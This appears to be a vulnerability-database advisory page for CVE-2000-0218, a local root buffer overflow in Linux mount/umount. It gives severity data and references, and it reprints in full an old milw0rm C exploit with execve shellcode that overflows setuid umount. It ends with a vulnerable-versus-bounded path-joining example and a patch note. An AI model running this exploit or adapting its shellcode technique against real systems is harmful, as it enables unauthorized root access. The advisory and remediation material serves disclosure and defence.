CVE-2000-0218
CVSS 7.2
Published: 2000-02-03 00:00:00
Revised: 2008-09-10 15:03:19

[Original] Buffer overflow in Linux mount and umount allows local users to gain root privileges via a long relative pathname.


[CNNVD] Linux Privilege Escalation Vulnerability (CNNVD-200002-028)

        A buffer overflow exists in the Linux mount and umount commands. A local user can gain root privileges by supplying an overly long relative pathname as an argument.

- CVSS (base score)

CVSS score: 7.2 [HIGH]
Confidentiality impact: COMPLETE [total information disclosure; all system files exposed]
Integrity impact: COMPLETE [system integrity can be completely compromised]
Availability impact: COMPLETE [can take the system down completely]
Access complexity: LOW [no specialized access conditions are needed to exploit]
Access vector: LOCAL [exploitation requires physical access or a local account]
Authentication: NONE [no authentication is needed to exploit]

- CPE (affected platforms and products)

cpe:/o:caldera:openlinux:2.3
cpe:/o:suse:suse_linux    SuSE Linux

- OVAL (technical details for detection)

No matching OVAL definitions found

- Official database links

http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2000-0218
(official data source) MITRE
http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2000-0218
(official data source) NVD
http://www.cnnvd.org.cn/vulnerability/show/cv_cnnvdid/CNNVD-200002-028
(official data source) CNNVD

- Other links and resources

http://www.osvdb.org/7004
(UNKNOWN)  OSVDB  7004
http://www.osvdb.org/6980
(UNKNOWN)  OSVDB  6980
ftp://ftp.caldera.com/pub/security/OpenLinux/CSSA-2000-002.0.txt
(UNKNOWN)  CALDERA  CSSA-2000-002.0

- Vulnerability information

Linux Privilege Escalation Vulnerability
High severity  Buffer overflow
2000-02-03 00:00:00 2005-05-02 00:00:00
Local
        A buffer overflow exists in the Linux mount and umount commands. A local user can gain root privileges by supplying an overly long relative pathname as an argument.

- Advisories and patches


- Vulnerability information (321)

Linux & BSD umount Local Root Exploit (EDBID:321)
multiple local
1996-08-13 Verified
0 bloodmask
N/A
/* Reminder - Be sure to fix the includes /str0ke */
-------------------------------------- linux_umount_exploit.c ----------
/* Headers this listing needs (the original header names were lost when the
   file was archived): sys/types.h for u_long/u_char/u_int, stdlib.h for
   malloc/exit, string.h for memset/strlen, unistd.h for execl/alarm. */
#include <sys/types.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <unistd.h>

#define PATH_MOUNT "/bin/umount"   /* setuid-root target; 32-bit x86 Linux only */
#define BUFFER_SIZE 1024           /* size of the stack buffer umount overflows */
#define DEFAULT_OFFSET 50          /* guessed distance from our %esp to the NOP sled */

/* Return the current stack pointer.  The asm leaves %esp in %eax, which is
   where a 32-bit x86 caller reads the integer return value from. */
u_long get_esp()
{
  __asm__("movl %esp, %eax");

}

int main(int argc, char **argv)
{
  /* 32-bit Linux execve("/bin/sh") shellcode; contains no NUL bytes, so
     strlen() gives its true length */
  u_char execshell[] =
   "\xeb\x24\x5e\x8d\x1e\x89\x5e\x0b\x33\xd2\x89\x56\x07\x89\x56\x0f"
   "\xb8\x1b\x56\x34\x12\x35\x10\x56\x34\x12\x8d\x4e\x0b\x8b\xd1\xcd"
   "\x80\x33\xc0\x40\xcd\x80\xe8\xd7\xff\xff\xff/bin/sh";

   char *buff = NULL;
   unsigned long *addr_ptr = NULL;
   char *ptr = NULL;

   int i;
   int ofs = DEFAULT_OFFSET;

   buff = malloc(4096);
   if(!buff)
   {
      printf("can't allocate memory\n");
      exit(0);
   }
   ptr = buff;

   /* fill start of buffer with nops, so an imprecise return address that
      lands anywhere in the sled still slides into the shellcode */

   memset(ptr, 0x90, BUFFER_SIZE-strlen(execshell));
   ptr += BUFFER_SIZE-strlen(execshell);

   /* stick asm code into the buffer */

   for(i=0;i < strlen(execshell);i++)
      *(ptr++) = execshell[i];

   /* the argument is now exactly BUFFER_SIZE bytes; the next two 4-byte
      words overwrite the saved frame pointer and return address with a
      guess at where the NOP sled will sit on umount's stack */
   addr_ptr = (unsigned long *)ptr;
   for(i=0;i < (8/4);i++)
      *(addr_ptr++) = get_esp() + ofs;
   ptr = (char *)addr_ptr;
   *ptr = 0;   /* terminate the argument string */

   (void)alarm((u_int)0);
   /* hand the oversized relative pathname to setuid umount as its argument */
   execl(PATH_MOUNT, "umount", buff, NULL);
   return 0;
}


// milw0rm.com [1996-08-13]
		

- Vulnerability information

6980
Linux mount Long Relative Path Overflow
Local Access Required Input Manipulation
Loss of Integrity
Exploit Unknown

- Vulnerability description

A local overflow exists in some Linux distributions. The mount command fails to validate arguments resulting in a buffer overflow. With a specially crafted request, an attacker can cause arbitrary code execution resulting in a loss of integrity.
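The overflow described above is the classic unchecked copy of a command-line argument into a fixed-size stack buffer. The following is an added example written for this page, not the exploit's code and not any distribution's mount(8) source; PATH_BUF, the join_path_* function names and the mount-point strings are assumptions chosen for illustration. It places the vulnerable join beside a bounded replacement and builds an argument of the exploit's shape (BUFFER_SIZE bytes plus two 4-byte words) so the hardened version can be seen rejecting it.

```c
/*
 * Added illustration for CVE-2000-0218, not code from the exploit above or
 * from any distribution's mount(8).  PATH_BUF and the function names are
 * assumptions for the example.
 */
#include <stdio.h>
#include <stdlib.h>
#include <string.h>

#define PATH_BUF 1024   /* assumed fixed stack buffer; same size as the exploit's BUFFER_SIZE */

/*
 * Vulnerable pattern: a relative mount point is joined to the current
 * directory with strcpy/strcat into a fixed stack buffer.  Nothing bounds
 * the length of `rel`, so a long argument runs past `full` into the saved
 * frame pointer and return address.  That is why the exploit above writes
 * exactly BUFFER_SIZE + 8 bytes on 32-bit x86: the buffer, then two 4-byte
 * words.  Shown only to make the defect concrete; never pass untrusted
 * input to it.
 */
size_t join_path_unsafe(const char *cwd, const char *rel)
{
    char full[PATH_BUF];
    strcpy(full, cwd);          /* unbounded copy */
    strcat(full, "/");
    strcat(full, rel);          /* attacker controls the length */
    return strlen(full);
}

/*
 * Hardened replacement: snprintf never writes past `outlen`, and a result
 * that would not fit (NUL included) is reported as an error rather than
 * silently truncated into a different path.  Returns the joined length,
 * or -1 on overflow, leaving `out` empty in that case.
 */
int join_path_safe(const char *cwd, const char *rel, char *out, size_t outlen)
{
    int n = snprintf(out, outlen, "%s/%s", cwd, rel);
    if (n < 0 || (size_t)n >= outlen) {
        if (outlen > 0)
            out[0] = '\0';
        return -1;
    }
    return n;
}

/*
 * Constructed input of the exploit's shape: total_len bytes of filler.
 * This is inert 'A's, not a payload; it only exercises the length check.
 */
char *make_long_relative_path(size_t total_len)
{
    char *p = malloc(total_len + 1);
    if (!p)
        return NULL;
    memset(p, 'A', total_len);
    p[total_len] = '\0';
    return p;
}

int main(void)
{
    char out[PATH_BUF];
    char *bad = make_long_relative_path(PATH_BUF + 8);

    if (!bad)
        return 1;
    printf("short argument: %d\n", join_path_safe("/mnt", "floppy", out, sizeof out)); /* 11 */
    printf("long argument:  %d\n", join_path_safe("/mnt", bad, out, sizeof out));      /* -1 */
    /* join_path_unsafe("/mnt", bad) would smash the stack here; it is not executed. */
    free(bad);
    return 0;
}
```

The check that matters is the comparison of snprintf's return value against the buffer size: a bounded copy that ignores truncation still avoids the overflow, but it would mount or unmount a path the user did not name, which is its own problem for a setuid binary.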

- Timeline

2000-02-03 Unknown
Unknown Unknown

- Solution

Upgrade to version indicated in vendor advisory or higher, as it has been reported to fix this vulnerability. An upgrade is required as there are no known workarounds.

- References

- Credit

Unknown or Incomplete
 

 
